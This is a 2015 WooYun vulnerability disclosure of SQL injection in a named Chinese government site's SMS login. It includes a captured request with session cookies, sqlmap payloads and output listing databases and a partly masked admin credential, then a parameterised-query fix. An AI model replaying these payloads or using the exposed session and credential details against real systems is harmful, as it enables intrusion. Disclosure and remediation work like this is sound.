WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-01-20: Details reported to the vendor, awaiting vendor handling
2015-01-22: Vendor confirmed; details disclosed to the vendor only
2015-02-01: Details disclosed to core white hats and experts in related fields
2015-02-11: Details disclosed to regular white hats
2015-02-21: Details disclosed to intern white hats
2015-03-06: Details disclosed to the public
Anhui Agriculture Net (安徽农网, http://www.ahnw.gov.cn/): SQL injection in the SMS platform login
http://www.ahnw.gov.cn/nwsms/
The login form is injectable.
Capture the request.
POST /nwsms/check_user.asp HTTP/1.1
Host: www.ahnw.gov.cn
Proxy-Connection: keep-alive
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.ahnw.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ahnw.gov.cn/nwsms/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvi=3620698112; ahnw_a1=3; _gscu_36441702=21559889a7v6ia16; ASPSESSIONIDASDCAAQR=LLNEFHLBNINFPPCOJMDIAEIE; Hm_lvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421560469,1421563064,1421566755,1421575818; Hm_lpvt_14b56e9c821143e7ea1b1d0a6aac72b5=1421575818; bg%5Fuser=; name=%C5%A9%CD%F8%B9%DC%C0%ED%D4%B1; UserRight=1%2C2%2C3%2C4%2C0%2C5%2C6; SPID=1; PowerList=%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C34%2C36%2C37%2C1%2C2%2C6%2C40%2C41%2C42%2C44%2C45%2C46%2C47%2C10%2C11%2C12%2C43%2C9%2C3%2C38%2C39%2C999%2C; Smpp=8999; UID=1; Cmpp=8999; userId=admin

userId=*&pwd=1%27&imageField.x=0&imageField.y=0
Run sqlmap against it (the * in the body marks the injection point).
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userId=' AND 1178=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1178=1178) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'jNqc'='jNqc&pwd='&imageField.x=44&imageField.y=12

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: userId=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(85)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(71)+CHAR(107)+CHAR(111)+CHAR(99)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)-- &pwd='&imageField.x=44&imageField.y=12

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: userId='; WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: userId=' WAITFOR DELAY '0:0:5'--&pwd='&imageField.x=44&imageField.y=12
---
[19:37:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:37:09] [INFO] fetching current user
current user: 'ahnw.sms'

[19:38:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:38:52] [INFO] fetching database names
[19:38:52] [INFO] the SQL query used returns 168 entries
available databases [159]:
159 databases. Logged in successfully with the account admin/ahnwj*****u.
#1. Filter the input.
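Concretely, for the login handler captured above (check_user.asp) the fix is to stop building the statement out of the form fields. The block below is an added example, not the site's code: it mirrors the concatenation pattern the report implies beside the parameterised form, using SQLite in place of SQL Server and a constructed user table, and runs the captured probe (pwd=1%27, i.e. the value 1') against both.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the SMS platform's user table (not its real
    schema). Passwords are stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userId TEXT, pwd TEXT, UID INTEGER)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse', 1)")
    conn.commit()
    return conn


def check_user_vulnerable(conn, user_id, pwd):
    """The pattern the report implies for check_user.asp (assumed, not its real
    source): form fields concatenated straight into the statement. A quote in
    either field changes the statement's structure, and the DBMS error that
    results is what the error-based technique in the sqlmap output keys on."""
    sql = ("SELECT UID FROM users WHERE userId = '" + user_id
           + "' AND pwd = '" + pwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def check_user_fixed(conn, user_id, pwd):
    """Parameterised statement: the driver passes the values separately from
    the SQL text, so a quote is just a character to compare, never syntax."""
    sql = "SELECT UID FROM users WHERE userId = ? AND pwd = ?"
    row = conn.execute(sql, (user_id, pwd)).fetchone()
    return row[0] if row else None


def probe(check, user_id, pwd):
    """Run one login attempt against a fresh database and report what the
    caller would observe: ('ok', UID-or-None), or ('error', message) when the
    DBMS rejects the statement."""
    conn = make_db()
    try:
        return ("ok", check(conn, user_id, pwd))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for name, check in (("vulnerable", check_user_vulnerable),
                        ("fixed", check_user_fixed)):
        print(name, probe(check, "admin", "1'"),
              probe(check, "admin", "correct-horse"))
```

The sqlmap output also shows stacked queries working and a login able to list 159 databases, so beyond parameterising the query the application's database account should be limited to the SMS platform's own tables.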
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-01-22 16:46
CNVD confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to the Anhui branch center, which will coordinate handling with the organization administering the website.
None yet.